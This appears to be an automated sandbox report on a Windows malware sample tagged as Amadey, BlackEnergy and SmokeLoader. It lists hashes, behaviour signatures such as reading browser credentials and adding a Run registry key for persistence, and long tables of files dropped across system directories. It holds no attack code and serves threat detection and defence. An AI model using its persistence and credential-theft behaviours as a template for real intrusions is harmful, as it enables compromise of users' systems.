Analysis
max time kernel: 148s
max time network: 152s
platform: windows11-21h2_x64
resource: win11-20250619-en
resource tags: arch:x64 arch:x86 image:win11-20250619-en locale:en-us os:windows11-21h2-x64 system
submitted: 04/07/2025, 12:10
Static task: static1
Behavioral task: behavioral1
  Sample: 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
  Resource: win10v2004-20250619-en
Behavioral task: behavioral2
  Sample: 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
  Resource: win11-20250619-en
General
Target: 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
Size: 17.0MB
MD5: 427915f92d6dfee464abcbe95899af89
SHA1: 26d814129899cf6fb1e96145b8e04b84515fc33d
SHA256: 0dacb1d51560612a2f24f0c64b40aabc49d9b9522a05a930df299b8f540af440
SHA512: 7a0ce3b689d2cd75424073ea3fe19f4c2c6ccace1ae953c956d1c2506c58886277bfa1dc80cc62ec332bafb4b059e89b0acb9018ff3c36abc93c0eef3a3e5cb6
SSDEEP: 49152:XYgph7GBfWSkph7GBfWBWcHPH90hOqZEDkYOMwwnMb4PmyVl:XX77GBfWz77GBfWBWC0RpYOXwnS4rVl
Malware Config
Signatures
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
Drops file in System32 directory (64 IoCs)
description | ioc | Process
File created | C:\Windows\SysWOW64\cmd.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\dfrgui.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\mcbuilder.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\mmc.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\poqexec.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\RdpSaProxy.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\TpmTool.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\where.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\notepad.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\TSTheme.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\TSTheme.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\tttracer.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\certreq.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\Com_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\MRINFO.EXE_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\notepad.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\certreq.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\printui.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\rundll32.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\expand.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\SystemPropertiesProtection.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\tcmsetup.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\mcbuilder.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\powercfg.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\raserver.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\SystemPropertiesRemote.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\taskkill.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\comp.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\Dism.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\fsutil.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\secinit.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\SpatialAudioLicenseSrv.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\SystemUWPLauncher.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\ByteCodeGenerator.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\cleanmgr.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\ctfmon.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\ieUnatt.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\tasklist.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\userinit.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\F12\IEChooser.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\agentactivationruntimestarter.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\choice.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\dccw.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\tar.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\cleanmgr.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\DevicePairingWizard.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\eudcedit.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\forfiles.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\PhotoScreensaver.scr | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\setupugc.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\timeout.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\eventvwr.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\PING.EXE- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\replace.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\srdelayed.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\user.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\WerFault.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\cmmon32.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\tar.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\odbcconf.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\SysWOW64\relog.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
Drops file in Program Files directory (64 IoCs)
description | ioc | Process
File created | C:\Program Files (x86)\Windows Media Player\wmpconfig.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Windows Media Player\wmplayer.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\pwahelper.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_helper.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateBroker.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jre-1.8\bin\java.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmadminicon.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\elevation_service.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jre-1.8\bin\klist.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Google\Chrome\Application\chrome_proxy.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\StickyNotesStub.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\dotnet\dotnet.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\Office16\msoev.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Windows Media Player\wmlaunch.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_pwa_launcher.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\bin\jar.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jre-1.8\bin\rmid.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Mozilla Firefox\private_browsing.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdate.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Common Files\microsoft shared\ink\ShapeCollector.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\visicon.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\msedge.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Windows Mail\wabmig.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Windows Media Player\wmlaunch.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\bin\xjc.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Java\jdk-1.8\bin\extcheck.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\7-Zip\Uninstall.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\GameBar.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Installer\setup.exe | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_proxy.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Program Files (x86)\Windows Media Player\wmplayer.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
Drops file in Windows directory (64 IoCs)
description | ioc | Process
File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..screencontentserver_31bf3856ad364e35_10.0.22000.1_none_5d8b0964af4f5e05\LockScreenContentServer.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-com-dtc-tracing_31bf3856ad364e35_10.0.22000.1_none_6e22e868f79867b0\msdtcvtr.bat_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup-support_31bf3856ad364e35_11.0.22000.348_none_04e0603a0d245e07\ie4uinit.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-update-usoclient_31bf3856ad364e35_10.0.22000.469_none_aa2bb1f81a06280c\r\UsoClient.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-winrsplugins_31bf3856ad364e35_10.0.22000.1_none_6c7a140d3670631f\winrs.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-msaudittools_31bf3856ad364e35_10.0.22000.1_none_781d59aef5ebc75f\auditpol.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.376_none_c7a79de54d7799ec\f\SyncAppvPublishingServer.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-e..-mdmdiagnosticstool_31bf3856ad364e35_10.0.22000.1_none_b5447a0b77a5213f\MdmDiagnosticsTool.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.22000.120_none_64d060998298410d\r\FileExplorer.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_openssh-common-components-onecore_31bf3856ad364e35_10.0.22000.1_none_12ea1a72b4886bec\scp.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\RMActivate.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-displayswitch_31bf3856ad364e35_10.0.22000.1_none_43054e9f294487ea\DisplaySwitch.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-d..-japanese-utilities_31bf3856ad364e35_10.0.22000.1_none_4dc986ddab447f27\IMJPUEX.EXE_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFaultSecure.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\x86_aspnet_regbrowsers_b03f5f7f11d50a3a_10.0.22000.1_none_a631d85ed7b16283\aspnet_regbrowsers.exe- | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..perience-ait-static_31bf3856ad364e35_10.0.22000.1_none_872834aeb30e11cf\aitstatic.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe_ | 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
